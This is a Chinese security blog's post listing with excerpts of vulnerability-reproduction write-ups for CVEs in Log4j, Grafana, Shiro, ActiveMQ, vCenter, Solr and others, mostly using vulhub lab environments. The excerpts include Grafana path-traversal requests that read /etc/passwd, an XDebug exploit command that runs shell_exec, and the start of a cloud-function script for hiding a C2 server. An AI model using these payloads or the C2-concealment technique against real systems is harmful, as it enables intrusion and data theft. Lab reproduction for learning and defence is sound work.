- 博客(12)
- 收藏
- 关注
原创 云函数隐匿C2服务器
第一步,创建云函数登录腾讯云平台,访问云函数功能链接:https://console.cloud.tencent.com/scf/list?rid=8&ns=default。点击新建,创建方式选择自定义创建。函数名称可以自定义进行设置,主要是函数代码部分,将下面内容复制到函数代码中:# -*- coding: utf8 -*-import json,requests,base64def main_handler(event, context): C2='http://<C
2022-03-04 13:13:07
7267
原创 ActiveMQ任意文件写入漏洞(CVE2016-3088)
漏洞说明该漏洞出现在fileserver应用中,漏洞原理:ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录。Fileserver支持写入文件(不解析jsp),但是支持移动文件(Move)我们可以将jsp的文件PUT到Fileserver下,然后再通过Move指令移动到可执行目录下访问。影响版本Apache ActiveMQ 5.0.0 - 5.13.2漏洞环境搭建漏洞复现浏览器访问ip:8161;如下图可以看出成功搭建访问..
2022-02-11 11:06:52
306
原创 (CVE-2016-4437) Apache Shiro 反序列化漏洞 复现
一、漏洞描述Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。只要rememberMe的AES加密密钥泄露,无论shiro是什么版本都会导致反序列化漏洞。二、漏洞影响只要rememberMe的AES加密密钥泄露,无论shiro是什么版本都会导致反序列化漏洞。三、环境搭建cd CVE-2016-4437/docker-compose up -d四、漏洞复现访问靶机ip使用工具进行半自动化注入检测shell成功写入,使用冰蝎.
2022-02-08 14:23:10
3307
原创 Apache HTTPD 换行解析 (CVE-2017-15715漏洞复现)
CVE-2017-15715漏洞介绍ApacheHTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页在2.4.0~2.4.29版本存在一个解析漏洞,在解析php时,1.php\x0A将按照php后缀进行解析,导致绕过一些服务器的安全策略漏洞复现编译及运行漏洞环境cd vulhub-master/httpd/CVE-2017-15715docker-compose builddocker-compose up -d用本机访问下http://192.168.
2022-02-08 12:17:14
2406
原创 (CVE-2021-21972)Vmware vcenter未授权任意文件上传
一、漏洞简介VMware是一家云基础架构和移动商务解决方案厂商,提供基于VMware的虚拟化解决方案。高危严重漏洞:在 CVE-2021-21972 VMware vCenter Server 远程代码漏洞 中,攻击者可直接通过443端口构造恶意请求,执行任意代码,控制vCenter。漏洞为任意文件上传:存在问题的接口为/ui/vropspluginui/rest/services/uploadova,完整路径(https://ip:port/ui/vropsplug..
2022-01-10 15:32:35
2814
原创 XDebug 远程调试漏洞复现(代码执行)
环境搭建启动dockersystemctl start docker进入对应目录cd vulhub/php/xdebug-rce/启动容器docker-compose up -d查看容器docker ps访问8080端口(搭建成功)在本机执行expexp的位置在vulhub/php/xdebug-rce/目录下(成功执行)python3 exp.py -t http://10.106.8.91:8080/index.php -c 'shell_exec..
2022-01-10 11:47:42
2959
1
原创 (CVE-2021-43798)Grafana任意文件读取漏洞复现
1、漏洞描述Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。2021年12月6日,国外安全研究人员披露Grafana中某些接口在提供静态文件时,攻击者通过构造恶意请求,可造成目录遍历,读取系统上的文件。2.验证poc/public/plugins/welcome/../../../../../../../../../etc/passwd/public/plugins/alertlist/..%2f..%2
2022-01-10 11:21:49
869
原创 Apache Log4j2漏洞复现(反弹shell)
0x01 漏洞描述Apache Log4j2是一款优秀的Java日志框架。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。阿里云应急响应中心提醒 Apache Log4j2 用户尽快采取安
2022-01-10 09:17:17
1839
转载 Apache ShenYu JWT认证缺陷绕过漏洞 (CVE-2021-37580)
0x00 漏洞详情Apache ShenYu(原名 Soul)是一个异步的、跨语言的、多协议的高性能响应式API 网关,并可应用于所有微服务场景。2021 年 11 月 16日,Apache发布安全公告,公开了Apache ShenYu中的一个身份验证绕过漏洞(CVE-2021-37580),该漏洞的CVSS评分为9.8。由于ShenyuAdminBootstrap中JWT的错误使用,导致攻击者可以绕过身份验证,直接进入目标系统后台。0x01 影响范围Apache ShenYu 2.3.0
2021-12-31 15:34:33
506
原创 Apache APISIX Dashboard 身份验证绕过漏洞 (CVE-2021-45232)
0x00 漏洞描述Apache APISIX 是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIX。CVE-2021-45232该漏洞的存在是由于 Manager API 中的错误。Manager API 在 gin 框架的基础上引入了 droplet 框架,所有的 API 和鉴权中间件都是基于 droplet 框架开发的。但
2021-12-31 15:32:28
3307
1
原创 Apache Druid LoadData 任意文件读取漏洞(CVE-2021-36749)
0x00 漏洞详情由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTPInputSource 来绕过应用程序级别的限制。攻击者可利用该漏洞在未授权情况下,构造恶意请求执行文件读取,最终造成服务器敏感性信息泄露。0x01 fofa语法title="Apache Druid"0x02 漏洞复现主界面–>Load data –>HTTP(s)–>Connect Data–>URIs(使用file://协议进行读.
2021-12-31 15:29:31
1353
原创 CVE-2019-0193漏洞复现:Apache Solr 远程命令执行漏洞复现
0X00漏洞简介CVE-2019-0193是一个存在于Apache solr搜索引擎中的命令执行漏洞0X01漏洞原因Apache solr 是一款开源的搜索服务器并且使用java语言开发;主要的工作方式:用户通过http请求像搜索引擎发出索引条件,solr对条件进行分词 处理,根据分词结果查找索引,继而找到文档 在Apache solr的可选模块DatalmportHandler中的DIH配置是可以包含脚本,因此存在安全隐患,在apache solr < 8.2.0版本之前DIH配置
2021-12-23 11:12:09
1617
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人
RSS订阅